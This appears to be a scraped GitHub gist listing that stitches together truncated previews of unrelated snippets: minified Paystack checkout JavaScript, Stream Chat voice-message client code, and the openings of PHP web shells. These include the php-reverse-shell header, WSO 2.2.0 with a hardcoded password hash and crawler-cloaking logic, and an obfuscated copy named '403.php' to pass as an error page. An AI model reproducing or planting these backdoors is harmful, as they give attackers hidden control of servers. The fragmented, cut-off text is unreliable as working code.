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Onwuka Gideon dongido001

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!function(){var eventMethod=window.addEventListener?"addEventListener":"attachEvent",eventer=window[eventMethod],messageEvent="attachEvent"==eventMethod?"onmessage":"message",config={siteUrl:"",paystackApiUrl:"",newCheckoutUrl:""};function Inline(t){this.iframe=null,this.background=null,this.iframeLoaded=!1,this.iframeOpen=!1,this.defaults=t,this.isEmbed=t&&null!=t.container,this.checkoutLoaded=!1,this.checkoutRemoved=!1,this.loadedButtonCSS=!1,this.setup(),this.listenForEvents(),noBrowserIframeSupport()&&(this.fallback=!0)}Inline.prototype.setTransaction=function(t){this.defaults&&this.resetNewCheckout(),this.defaults=t,this.isEmbed=null!=t.container,this.isEmbed?(this.removeNewCheckout(),this.setupEmbed()):this.updateIframe()},Inline.prototype.setForm=function(t){this.form=t,this.createButton()},Inline.prototype.loadButtonCSS=function(){var t=this;cssLoad(config.siteUrl+"public/css/button.min.css").done(function(){t.loadedButtonCSS=!
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
// In all other respects the GPL version 2 applies:
/* WSO 2.2.0 (Web Shell by HARD _LINUX) */
$auth_pass = "72b9c4b5239ef9f87cc840f82aaf58f5"; //admin
$color = "#fff";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
dongido001 / 403.php
Last active November 27, 2020 08:10
ini_set('display_errors', 1);
$▛ = "72b9c4b5239ef9f87cc840f82aaf58f5"; //Password
$▘ = true;
$▜ = 'UTF-8';
$▚ = 'FilesMan';
$▙ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
// [...]
recording.addEventListener("pointerup", async () => {
// Stop the recording
recorder.state == "recording" && recorder.stop()
recordedChunks = await recordedChunks
recordedBlob = new Blob(recordedChunks, {type: 'audio/ogg; codecs="opus"'});
// Create an audio file
var audioFile = new File([recordedBlob], "audio.ogg", {
function appendMessage(message) {
const messageContainer = document.getElementById("messages")
// Create and append the message div
const messageDiv = document.createElement("div")
messageDiv.className = `message ${ === username ? 'message-right' : 'message-left' }`
// Create the username div
const usernameDiv = document.createElement("div")
usernameDiv.className = "message-username"
// [...]
function checkAuthState() {
if (!user.value) {
document.getElementById("login-block").style.display = "grid"
document.getElementsByClassName("message-container")[0].style.display = "none";
} else {
document.getElementsByClassName("message-container")[0].style.display = "grid";
document.getElementById("login-block").style.display = "none"
username = user.value
// [...]
client = new StreamChat("<STREAM_API_KEY>")
async function initializeClient() {
const token = await generateToken(username)
id: username,
name: "Jon Snow", // Update this name dynamically
image: "",
}, token); // token generated from our Node server
// Global variables
let client, channel, username,
timeOutID, recorder, response,
recordedBlob = [],
async function generateToken(username) {
const { token } = (await axios.get(`/token?username=${username}`)).data
return token
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